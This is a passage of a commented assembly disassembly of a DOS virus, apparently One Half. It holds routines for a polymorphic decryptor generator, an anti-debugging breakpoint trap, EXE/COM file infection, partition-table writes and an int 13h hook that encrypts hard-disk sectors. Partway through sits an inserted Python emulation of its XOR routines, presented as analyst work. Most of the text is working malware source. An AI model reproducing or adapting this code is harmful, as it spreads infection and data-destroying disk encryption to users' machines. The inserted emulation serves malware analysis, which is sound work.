mov_ax_? dw 265h ; store starting_sector_stosw ; _2_ cryptmov ax , 301h ; write the new parition_tablepop bxmov cx , 1call int_13hjc loc_09C0 ; error ?

loc_0A1D :pop bx ; nope

loc_0A1E :push cs ; dis is a renewal of partspop ds ; that were overwritten push cs ; by decode routinepop esdb 8Dh, 0B7h ; lea si, cs:[overwritt...][bx]dw offset overwritten_bytez - pdb 81h , 0C3h ;add bx, offset decode_...dw offset decode_routine_table - pmov cx , 0Ah ; there'z 0ah_partz

locloop_0A2D :mov di , [ bx ] ; gimme where_2_move_offsetpush cxmov cx , 0Ah ; every_part haz 0ah bytezrep movsbpop cxinc bx ; go2 next_move_offsetinc bxloop locloop_0A2D ; and go on

pop esdb 83h , 0C3h ; add bx, 0 - (....)db 0 - ( offset beginning_ofs - offset exe_header )mov di , es ; bx 2 exe_header_offsetadd di , 10h ; count start_segadd [ bx +16h ], di ; store relo_csadd [ bx +0Eh], di ; store relo_sscmp word ptr [ bx +6], 0 ; what'bout relo_cnt ?je short loc_0AB6 ; there'z any ?mov ds , es :[ 2ch ] ; yope; gimme environment_segxor si , si ; start at offset 00h

loc_0A56 :inc sicmp word ptr [ si ], 0 ; eof formal_environment ?jne loc_0A56add si , 4 ; go2 prog_namexchg dx , simov ax , 3D00h ; open prog_fileint 21hjc short loc_0ADB ; error ?

push cspop dsmov ds :[ handle_ - p - 10h ][ bx ], ax ; store handle_mov dx , [ bx +18h ] ; gimme tabl_offsetmov ax , 4200h ; f_ptr 2 itcall sub_0817push es ; store start_segxchg di , ax

loc_0A79 :push axlea dx , cs :[ reloc_buffer - p - 10h ][ bx ]mov cx , [ bx +6] ; gimme relo_cntcmp cx , ( name_buffer + 34 - random_number ) shr 2jb short loc_0A8A ; 2 big ?mov cx , ( name_buffer + 34 - random_number ) shr 2

; yope gimme max_relo_cnt_nowloc_0A8A :

sub [ bx +6], cx ; sub it from relo_cntpush cxshl cx , 1 ; mul it with 4shl cx , 1 ; (segment:offset)mov ah, 3Fh ; read reloc_tablecall sub_0817jc short loc_0ADB ; error ?pop cxpop axxchg si , dx

locloop_0A9D :add [ si +2], ax ; make relo_segles di , dword ptr [ si ] ; gimme relo_addradd es :[ di ], ax ; and add start_segadd si , 4 ; go2 next entryloop locloop_0A9D

cmp word ptr [ bx +6], 0 ; relo_cnt is null ?ja loc_0A79 ; if yope go onpop es ; nopemov ah, 3Eh ; so close_filecall sub_0817

loc_0AB6 : ; nopepush espop dscmp byte ptr cs :[ bx +12h ], 0 ; com_file ?jne short loc_0ACCmov si , bx ; gimme exe_header_offsetmov di , 100hmov cx , 3 ; move 3 bytez 2 100hrep movsbpop axjmp short loc_0AD7 ; and go on

loc_0ACC : ; nope it'z exe_filepop axclimov sp , cs :[ bx +10h ] ; gimme spmov ss , cs :[ bx +0Eh] ; gimme sssti

loc_0AD7 :jmp dword ptr cs :[ bx +14h ] ; finally jmp 2 real_prog_start

loc_0ADB :mov ah, 4Ch ; there waz an error !int 21h

;reloc_buffer label near

;

; in : dx = max_number; out : dx = random_numberrandom_number :

mov cs :[ mov_si_? - p], sipush axpush bxpush cxpush dxdb 0b9h ; mov cx, ?

mov_cx_? dw 0b0d4hdb 0bbh ; mov bx, ?

mov_bx_? dw 6210hmov dx , 15Ahmov ax , 4E35hxchg si , axxchg dx , axtest ax , axjz short loc_0AFCmul bx

loc_0AFC :jcxz short loc_0B03xchg cx , axmul siadd ax , cx

loc_0B03 :xchg si , axmul bxadd dx , siinc axadc dx , 0mov cs :[ mov_bx_? - p], axmov cs :[ mov_cx_? - p], dxmov ax , dxpop cxxor dx , dxjcxz short loc_0B1Ediv cx

loc_0B1E :pop cxpop bxpop axpop sipush sicmp byte ptr cs :[ si ], 0CCh ; there'z a breakpoint ?

loc_0B27 :je loc_0B27 ; if yope stay in loop

; (nice_try ...)db 0beh ; mov si, ?

mov_si_? dw 5cbhretn

sub_08D4 endp

; decode_routine haz 10 piecez ... (10 instructionz );

instr_start :db 01h ; instruction_lengthdb 50h ; push ?_reg;

db 01h ; instruction_lengthpush_what db 0eh ; push cs or push ss

;db 01h ; instruction_lengthdb 1fh ; pop ds;db 03h ; instruction_length

mov_index_? db 0bfh ; mov ?_index_reg, im16viruz_start dw 0582h ; im16

;db 03h ; instruction_length

mov_?_instr db 0b8h ; mov ?_reg, im16crypt_viruz_value dw 0bfbah ; im16

;db 02h ; instruction_lengthdb 31h ; xor [index_reg], ?_reg

xor_?_instr db 05h ; ModR/M;db 04h ; instruction_lengthdb 81h ; add ?_reg, im16

add_?_instr db 0c0h ; ModR/M, opcodenext_crypt_value_ dw 6efeh ; im16

;db 01h ; instruction_length

inc_?_instr db 47h ; inc ?_reg;db 04h ; instruction_lengthdb 81h ; cmp ?_index_reg, im16

cmp_index_? db 0ffh ; ModR/M, opcodeviruz_end dw 135ah ; im16

;db 02h ; instruction_lengthdb 75h ; jnz disp8db 0efh;

;unimportant_instr :

;nopstcclcstidb 2Eh ; cs:db 36h ; ss:db 3Eh ; ds:cldstdcmc;

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz movez unimportant_instr 2 buffer; in : dx = how many :-)sub_0B57 proc near

or dx , dx ; count is null ?jz short loc_ret_0B71push sipush cx ; push regzpush dxmov cx , dx ; count 2 cx

locloop_0B60 :mov si , offset unimportant_instr - pmov dx , 0Ah ; max_random 2 0ah (10 instr)call random_number ; gimme random_numberadd si , dx ; go2 instructionmovsb ; move itloop locloop_0B60 ; and go on

pop dxpop cx ; restore regzpop si

loc_ret_0B71 :retn ; and end ...

sub_0B57 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz putz be4 and after instruction unimportant_instructionz; in : dx = how many u_instrsub_0B72 proc near

mov ax , dx ; instr_count 2 axinc dxcall random_number ; gimme random_numbersub ax , dx ; sub cur_instr_count from

; instr_countcall sub_0B57 ; move unimportant_instrxchg dx , axrep movsb ; move real_instructiondb 81h , 0FBh ; cmp bx, offset jnz_offset - pdw offset jnz_offset - p ; it'z last_one ? (jnz xor_...)jnz short loc_0B92mov ax , ds :[ xor_offset - p] ; gimme xor_offsetsub ax , di ; sub cur_instr_buffer_indexadd ax , offset instr_buffer - p; add instr_buffer_backsub ax , [ bx ] ; sub jnz_offsetdec di ; go2 disp8stosb ; and store it

loc_0B92 :call sub_0B57 ; and now put some u_instr

; after real_instructionretn ; and end ...

sub_0B72 endp

m_?_i dw offset mov_?_instr - p ; 0b38h ; 0b96h ; 0614hx_?_i dw offset xor_?_instr - p ; 0b3dh ; 0b98h ; 0616ha_?_i dw offset add_?_instr - p ; 0b40h ; 0b9ah ; 0618hm_i_? dw offset mov_index_? - p ; 0b34h ; 0b9ch ; 061ahx_?_i_ dw offset xor_?_instr - p ; 0b3dh ; 0b9eh ; 061chi_?_i dw offset inc_?_instr - p ; 0b44h ; 0ba0h ; 061ehc_i_? dw offset cmp_index_? - p ; 0b47h ; 0ba2h ; 0620h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; This sets rite ModR/M instructions ....; There are two phases here:; 1. : m_?_i - a_?_i = sets instruction that worx with xor_reg; 2. : m_i_? - c_i_? = sets instruction that worx with index_reg; in : dl = random_number that depends on phase

; Just go through it and try to know what's happening here :)sub_0BA4 proc nearloc_0BA4 :

lodswxchg di , axmov al , dlcmp si , offset i_?_i - pjne short loc_0BB6and al , 5cmp al , 1jne short loc_0BC6mov al , 7

loc_0BB6 :cmp si , offset a_?_i - pjne short loc_0BC6mov cl , 3shl al , clor [ di ], alor al , 0C7hjmp short loc_0BCA

loc_0BC6 :or [ di ], alor al , 0F8h

loc_0BCA :and [ di ], alcmp si , offset m_i_? - pje short loc_ret_0BDAcmp si , offset sub_0BA4 - pje short loc_ret_0BDAjmp short loc_0BA4

loc_ret_0BDA :retn

sub_0BA4 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz preparez decode_routine ...sub_0BDB proc near

mov dx , 2call random_number ; gimme random_numbermov byte ptr ds :[ push_what - p], 0Eh; store push_csor dx , dx ; random_number zero ?jz short loc_0BEFmov byte ptr ds :[ push_what - p], 16h ; nope so store

; push_ssloc_0BEF :

mov si , offset m_?_i - p ; start with first_phazeloc_0BF2 :

mov dx , 8call random_number ; gimme random_numbercmp dl , 4 ; we don't need sp_regje loc_0BF2mov bl , dl ; reg 2 blcall sub_0BA4 ; set instructionz etc.mov si , offset m_i_? - p ; start with second_phaze

loc_0C05 :mov dx , 3call random_number ; gimme random_numberadd dl , 6cmp dl , 8

jne short loc_0C15mov dl , 3 ; yope set bx_reg

loc_0C15 :cmp dl , bl ; xor_reg = index_reg ?je loc_0C05call sub_0BA4 ; nope so set instr. etc.xor cx , cxmov di , offset decode_routine_table - p

loc_0C21 :cmp cx , 9 ; jnz_instruction ?jne short loc_0C40

loc_0C26 : ; yope; it'z jnz disp8; so it must be in the range; 0 - 80h bytez

mov dx , 0C8hcall random_number ; gimme random_numbersub dx , 64h ; sub 0c8h / 2add dx , ds :[ xor_offset - p] ; add xor_offsetcmp dx , 0 ; less than 0 ?jl loc_0C26cmp dx , ds :[ max_number - p] ; more or same than max_number?jge loc_0C26jmp short loc_0C46

loc_0C40 :db 0bah ; mov dx, ?

max_number dw 466h ; random_max iz max_numbercall random_number ; gimme random_number

loc_0C46 :jcxz short loc_0C5F ; first timez here ?mov si , offset decode_routine_table - ppush cx ; nope

locloop_0C4C : ; so go2 cur_instr and check; 4 distancez

lodswsub ax , dx ; check 4 distancecmp ax , 0Ah ; more or same than 0ah bytez ?jge loc_0C5Ccmp ax , 0FFF6h ; less or same than 0ah bytez ?jle loc_0C5Cpop cx ; nope ! get another random_#jmp loc_0C21

loc_0C5C : ; yopeloop locloop_0C4C ; so go2 next insrtpop cx ; last_one

loc_0C5F :xchg dx , ax ; random_number 2 axstosw ; store it 2 decode_...inc cx ; inc countercmp cx , 0Ah ; less than 0ah (10 piecez) ?jb loc_0C21

; nope = decode_routine_table; initialized ...

mov bx , offset decode_routine_table - pmov si , offset instr_start - p

loc_0C6D :mov di , offset instr_buffer - plodsb ; read instr_lengthmov cl , al ; instr_length 2 cxmov dx , 8 ; u_instr 2 dxsub dx , cx ; sub itmov ax , [ bx +2] ; gimme next_d_entry_offset

; if jnz_instr next iz

; viruz_beginning ...sub ax , [ bx ] ; sub from it cur_d_entrycmp ax , 0Ah ; distance 0ah ?jne short loc_0C8Binc dx ; inc u_instr (we don't needinc dx ; jmp_instr ...)call sub_0B72inc bx ; go2 next decode_routine_inc bx ; _offsetjmp short loc_0CB5 ; and go on

loc_0C8B : ; nopecall random_number ; gimme random_numbercall sub_0B72 ; copy instruction 2 buffer ...mov dx , di ; gimme instr_buffer_offsetsub dx , offset three_bytez - p; sub ofs instr_buffer - 3add dx , [ bx ] ; add cur_d_entrymov al , 0E9h ; far_jmp 2 alstosb ; store itinc bx ; go2 next_entryinc bxmov ax , [ bx ] ; gimme itsub ax , dx ; sub itcmp ax , 7Eh ; distance more than 7eh ?jg short loc_0CB4cmp ax , 0FF7Fh ; distance less than 0ff7fh ?jl short loc_0CB4inc ax ; nope inc distance (jmp_short

; only 2 bytez ...)mov byte ptr [ di - 1], 0EBh ; store rather jmp_shortstosb ; store disp8jmp short loc_0CB5 ; and go on

loc_0CB4 : ; yopestosw ; store disp16

loc_0CB5 :push bxpush cxdb 0b9h ; mov cx, 0

mov_cx_?_ dw 0 ; gimme file_pointerdb 0bah ; mov dx, 13h

mov_dx_?_ dw 13hadd dx , [ bx - 2] ; add decode_table_entryadc cx , 0 ; (the current)push cxpush dxcall sub_0E63 ; go2 f_ptrmov cx , 0Ah ; read 0ah bytezdb 0bah ; mov dx, ?

buffer_offset dw 0a4h ; 2 [buffer_offset]add ds :[ buffer_offset - p], cx ; go2 next_buffer_offset_entrycall f_read_pop dxpop cxjc short loc_0CE6 ; error ?call sub_0E63 ; go back 2 f_ptrxchg cx , di ; cur_instr_buffer_offset 2 cxmov dx , offset instr_buffer - p; sub offset instr_buffersub cx , dx ; sub it 2 get instr_sizecall f_write_ ; and write it ...

loc_0CE6 :pop cxpop bxjc short loc_ret_0CF3 ; error ?db 81h , 0FBh ; cmp bx, offset beginning_ofs - p

dw offset beginning_ofs - pjnc short loc_ret_0CF3 ; last decode_routine_entry ?jmp loc_0C6D ; nope so go on ...

loc_ret_0CF3 : ; yoperetn ; so end ...

sub_0BDB endp

; Purpose of moving to buffer:; while writing viruz_body to file, the virus crypts viruz_body so; int_13h and crypt_routine and routine that writes it to file; far far away from range of crypt_routinepresun_rutiny :

mov cx , offset buffer - p ; gimme size 2 writexor dx , dx ; start with offset nullcall sub_0D12 ; crypt_ itmov ah, 40h ; write crypted_ viruz_bodymov bx , ds :[ handle - p] ; 2 file; gimme handlepushf ; anddb 9Ah ; call far ptr old_int_21h

old_int_21h dw 0, 0jc short loc_0D0C ; error ?cmp ax , cx ; written_&_wanted the same ?

loc_0D0C :pushf ; push flagzcall sub_0D12 ; decrypt_ viruz_bodypopf ; restore flagzretn ; and end ...

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz cryptz_ viruz_bodysub_0D12 proc near

push cxmov si , dx ; gimme viruz_start_offsetdb 0b8h ; mov ax, 0

crypt_viruz dw 0 ; gimme init_crypt_valemov cx , offset buffer - p ; gimme viruz_size

locloop_0D1B :xor [ si ], ax ; crypt_itdb 05h ; add ax, ?

next_crypt_value dw 0 ; go2 next_crypt_valueinc si ; go2 next viruz_byteloop locloop_0D1B ; and go on

pop cxretn ; and end ...

sub_0D12 endp

new_int_24h :mov al , 3iret

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz callz old_int_13hsub_0D28 proc near

pushfcall dword ptr cs :[ old_int_13h - p__ ]retn

sub_0D28 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz getz cylinder_number in sisub_0D2F proc near

push cxpush dxshr cl , 1shr cl , 1and dh, 0C0hor dh, clmov cl , 4shr dh, clmov dl , chxchg si , dxpop dxpop cxretn

sub_0D2F endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz cryptz_ a buffercrypt_ proc near

push axpush bx ; push regzpush cxdb 0b0h ; mov al, ?

secz_count db 0 ; gimme secz_countdb 0bbh ; mov bx, ?

buf_ptr dw 0 ; gimme buf_ptrloc_0D4D :

mov cx , 100h ; do it 256*; (in wordz)

locloop_0D50 :db 26h , 81h , 37h ; xor word ptr es:[bx], ?

crypt_value dw 2b50h ; xor word ...inc bx ; go2 next_word in bufferinc bxloop locloop_0D50 ; and go on

dec al ; dec secz_countjnz loc_0D4D ; last one ?pop cx ; yopepop bx ; restore regzpop axretn ; and end ...

crypt_ endp
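As an added analyst-side emulation (not part of the listing, and not the author's code) of the two XOR routines above, sub_0D12 for the file body and crypt_ for disk sectors: it shows that sub_0D12 XORs a whole 16-bit word at every one-byte step of si, so each inner body byte is keyed twice and one byte past the body is touched, and that both routines are their own inverse. The parameters 0BFBAh/6EFEh are the immediates visible in instr_start; all sample buffers are constructed.

```python
# Added analyst-side emulation of sub_0D12 (body crypt) and crypt_ (sector
# crypt) from the One Half listing above. Not part of the original
# disassembly; all sample data below is constructed.

MASK16 = 0xFFFF


def crypt_body(region: bytes, init_value: int, next_value: int) -> bytes:
    """Emulate sub_0D12 on `region`, which must include ONE trailing byte
    beyond the body: the loop runs viruz_size times, and each step XORs the
    16-bit word at [si] with ax (`xor [si], ax`), then executes
    `add ax, next_crypt_value` and `inc si` (a one-byte stride).
    The last word therefore straddles the end of the body."""
    if len(region) < 2:
        raise ValueError("region must be the body plus one trailing byte")
    out = bytearray(region)
    ax = init_value & MASK16                  # crypt_viruz (initial key)
    for si in range(len(out) - 1):            # loop cx = viruz_size times
        word = out[si] | (out[si + 1] << 8)   # little-endian word at [si]
        word ^= ax                            # xor [si], ax
        out[si] = word & 0xFF
        out[si + 1] = word >> 8
        ax = (ax + next_value) & MASK16       # add ax, next_crypt_value
    return bytes(out)


def body_keystream(body_len: int, init_value: int, next_value: int) -> bytes:
    """Closed form of the same transformation: body byte i is XORed with
    low(k_i) ^ high(k_{i-1}), where k_i = init + i*next (mod 2^16), and the
    trailing byte with high(k_{n-1}). Returns body_len + 1 bytes."""
    ks = bytearray(body_len + 1)
    for i in range(body_len):
        k = (init_value + i * next_value) & MASK16
        ks[i] ^= k & 0xFF
        ks[i + 1] ^= k >> 8
    return bytes(ks)


def crypt_sectors(buf: bytes, crypt_value: int, sector_count: int) -> bytes:
    """Emulate crypt_: XOR every 16-bit word of `sector_count` consecutive
    512-byte sectors (256 words each) with the constant crypt_value.
    The routine counts with `dec al / jnz`, so its caller (new_int_13h)
    only invokes it with secz_count >= 1; that precondition is enforced."""
    if sector_count < 1:
        raise ValueError("crypt_ is only called with a non-zero sector count")
    need = sector_count * 512
    if len(buf) < need:
        raise ValueError("buffer shorter than the sectors to process")
    out = bytearray(buf)
    lo, hi = crypt_value & 0xFF, (crypt_value >> 8) & 0xFF
    for off in range(0, need, 2):
        out[off] ^= lo                        # xor word ptr es:[bx], value
        out[off + 1] ^= hi
    return bytes(out)


# Constructed sample: a 15-byte "body" plus the one trailing byte that
# sub_0D12 also touches, keyed with the immediates seen in instr_start.
SAMPLE_BODY = bytes(range(0x10, 0x1F)) + b"\x00"
INIT_VALUE, NEXT_VALUE = 0xBFBA, 0x6EFE


def demo() -> dict:
    """Run both routines on the constructed data and return the properties
    an analyst relies on: each routine is an involution, and the byte-stride
    word XOR equals the closed-form keystream."""
    enc = crypt_body(SAMPLE_BODY, INIT_VALUE, NEXT_VALUE)
    ks = body_keystream(len(SAMPLE_BODY) - 1, INIT_VALUE, NEXT_VALUE)
    sectors = bytes(512) + bytes(range(256)) * 2   # two sectors, constructed
    sec_enc = crypt_sectors(sectors, 0x2B50, 1)    # only the first sector
    return {
        "body_roundtrip": crypt_body(enc, INIT_VALUE, NEXT_VALUE) == SAMPLE_BODY,
        "keystream_matches": enc == bytes(a ^ b for a, b in zip(SAMPLE_BODY, ks)),
        "trailing_byte_touched": enc[-1] != SAMPLE_BODY[-1],
        "sector_roundtrip": crypt_sectors(sec_enc, 0x2B50, 1) == sectors,
        "second_sector_untouched": sec_enc[512:] == sectors[512:],
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```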

new_int_13h :cmp ah, 2 ; read sector(z) ?je short loc_0D6Ecmp ah, 3 ; write sector(z) ?je short loc_0D6Ejmp loc_0E50 ; nope so end

loc_0D6E :cmp dx , 80h ; 0.head, first_harddisk ?

jne short loc_0DE0test cx , 0FFC0h ; cylinder is null ?jnz short loc_0DE0push bx ; ok it could be work withpush dx ; partition_table or withpush si ; viruz_bodypush dipush cxpush cxmov si , ax ; gimme ax_regand si , 0FFh ; gimme secz_2_workmov di , simov al , 1push axjz short loc_0DBB ; secz_2_work is null ?jcxz short loc_0DDB ; sec_number is null ?cmp cl , 1 ; work with parition_table ?je short loc_0DCD

loc_0D94 : ; nope so it could be viruzdb 80h , 0f9h ; body

max_sektor db 11h ; cmp cl, ?ja short loc_0DDB ; are we in the rangedb 80h , 0f9h ; cmp cl, ?

partition_sec_n db 0ah ; where'z viruz_body ?jb short loc_0DD2cmp ah, 3 ; yope = writing ?je short loc_0DDB ; (end_with error)push bxmov cx , 200h ; do it 512*

locloop_0DA7 :mov byte ptr es :[ bx ], 0 ; store nullinc bx ; inc buffer_ptrloop locloop_0DA7 ; and go on ...

pop bxloc_0DAF :

add bx , 200h ; go2 next_sec_in_bufferpop axpop cxinc cx ; inc sec_numberpush cxpush axdec si ; dec secz_2_workjnz loc_0D94 ; null ?

loc_0DBB :clc

loc_0DBC : ; yopepop ax ; restore ax_regpushfxchg di , ax ; secz_2_work 2 axsub ax , si ; sub secz_that_weren't_readpopfmov ah, ch ; error number 2 ahpop cxpop cxpop di ; restore regzpop sipop dxpop bxretf 2 ; and end ...

loc_0DCD :mov cl , byte ptr cs :[ partition_sec_n - p__ ] ; yope

; so gimme parition_table_secloc_0DD2 :

call sub_0D28 ; write or read itmov ch , ah ; gimme possible_error_numberjc loc_0DBC ; error ?jmp short loc_0DAF ; nope = go on

loc_0DDB : ; yopestc ; so set up error_flagmov ch , 0BBh ; and error_number 2 chjmp short loc_0DBC ; (undefined_error)

loc_0DE0 : ; nopecmp dl , 80h ; it'z first_harddisk ?jne short loc_0E50push axpush cxpush dxpush si ; push regzpush dspush cspop dsmov byte ptr ds :[ secz_count - p__ ], 0 ; store nullmov word ptr ds :[ buf_ptr - p__ ], bx ; store bxcall sub_0D2F ; gimme cylinder_numberand cl , 3Fh ; trim sectorand dh, 3Fh ; trim head

loc_0DFE :or al , al ; secz_2_work is null ?jz short loc_0E31db 81h , 0feh ; cmp si, ?

max_cyl_number dw 265h ; are we in the rangejae short loc_0E31 ; where'z harddiskdb 81h , 0feh ; cmp si, ?

cur_cyl_number dw 1234h ; crypted_ ?jb short loc_0E14inc byte ptr ds :[ secz_count - p__ ] ; yope inc secz_countjmp short loc_0E1A

loc_0E14 :add word ptr ds :[ buf_ptr - p__ ], 200h ; go2 next_sec_in_buf

loc_0E1A :dec al ; dec secz_2_workinc cldb 80h , 0f9h ; cmp cl, ?

max_sektor_2 db 11h ; sector in range ?jbe loc_0DFEmov cl , 1 ; nope so sector 2 1inc dh ; and inc headdb 80h , 0feh ; cmp dh, ?

max_heads db 07h ; head in range ?jbe loc_0DFExor dh, dh ; nope so head 2 nullinc si ; and inc cylinderjmp short loc_0DFE ; and go on

loc_0E31 : ; yopecmp byte ptr ds :[ secz_count - p__ ], 0; must we (un)crypt_pop ds ; something ?pop si ; restore regzpop dxpop cxpop axjz short loc_0E50cmp ah, 2 ; yope; read ?je short loc_0E45call crypt_ ; nope write; crypt_ it

loc_0E45 :call sub_0D28 ; do itpushfcall crypt_ ; and uncrypt_ itpopfretf 2

loc_0E50 : ; end ...db 0EAh ; jmp far ptr old_int_13h

old_int_13h label near

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz writez 2 file ...f_write_ proc near

mov ah, 40hjmp $ + 4

f_write_ endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz readz from file ...f_read_ proc near

mov ah, 3Fh ; '?'call sub_0E6Fjc short loc_ret_0E5Ecmp ax , cx

loc_ret_0E5E :retn

f_read_ endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz call f_ptr fcsub_0E5F proc near

xor cx , cxmov dx , cx

sub_0E63 :mov ax , 4200hjmp short loc_0E6F

sub_0E68 :xor cx , cxmov dx , cx

sub_0E6C:mov ax , 4202h

sub_0E6F :loc_0E6F :

mov bx , word ptr cs :[ handle - p]

; Diz call old_int_21hint_21h :

pushfclicall dword ptr cs :[ old_int_21h - p__ ]retn

sub_0E5F endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz infectz the file ...sub_0E7C proc near

mov bp, spmov ax , 5700h ; gimme file_time_&_datecall sub_0E6Fmov bx , offset file_time_date - pmov [ bx ], cx ; store time_stampmov [ bx +2], dx ; store date_stampcall sub_1157 ; file already infected ?jc short loc_0F0Amov dx , 1Ehcall random_number ; gimme random_numberor dx , dx ; null ?jz short loc_0E9Dmov [ bx ], ax ; nope so store new_time_stamp

loc_0E9D :mov word ptr ds :[ buffer_offset - p], offset overwritten_bytez - pmov dx , 0FFFFhpush dxcall random_number ; gimme random_numbermov ds :[ crypt_viruz_value - p], dx ; store itmov ds :[ crypt_viruz - p__ ], dx ; store itpop dxcall random_number ; gimme next_random_numbermov ds :[ next_crypt_value_ - p], dx ; store itmov ds :[ next_crypt_value - p__ ], dx ; store itcall sub_0E5F ; go2 sofmov cx , 1Ah ; read 1ah_bytezmov dx , offset file_buffer - p; 2 file_bufferpush dx ; (exe_hdr or 3bytez from com)call f_read_ ; read itjc short loc_0F24 ; error ?xchg si , dx ; move thesemov di , offset exe_header - prep movsb ; bytezcall sub_0E68 ; go2 eofmov si , ax ; size in ax : dxmov di , dx ; 2 si : dipop bxcmp word ptr [ bx ], 4D5Ah ; 'MZ' ?je short loc_0EFA ; it'z exe_file ?cmp word ptr [ bx ], 5A4Dh ; 'ZM' ?je short loc_0EFA ; it'z exe_file ?mov byte ptr ds :[ exe_flag - p], 0; nope = clear exe_flagcmp ax , 0EFA6h ; file not 2 big ?cmcjc short loc_0F24mov ax , 3 ; nopecwd ; null dx_regpush bxjmp short loc_0F16

loc_0EFA :mov byte ptr ds :[ exe_flag - p], 1 ; set up exe_flagmov ax , [ bx +4] ; gime page_cntmul word ptr ds :[ page_size_ - p] ; mul it with page_sizesub ax , sisbb dx , di

loc_0F0A :jc short loc_0F24mov ax , [ bx +8] ; gimme hdr_size

mul word ptr ds :[ hdr_size_ - p] ; mul it with hdr_sizepush bxpush axpush dx

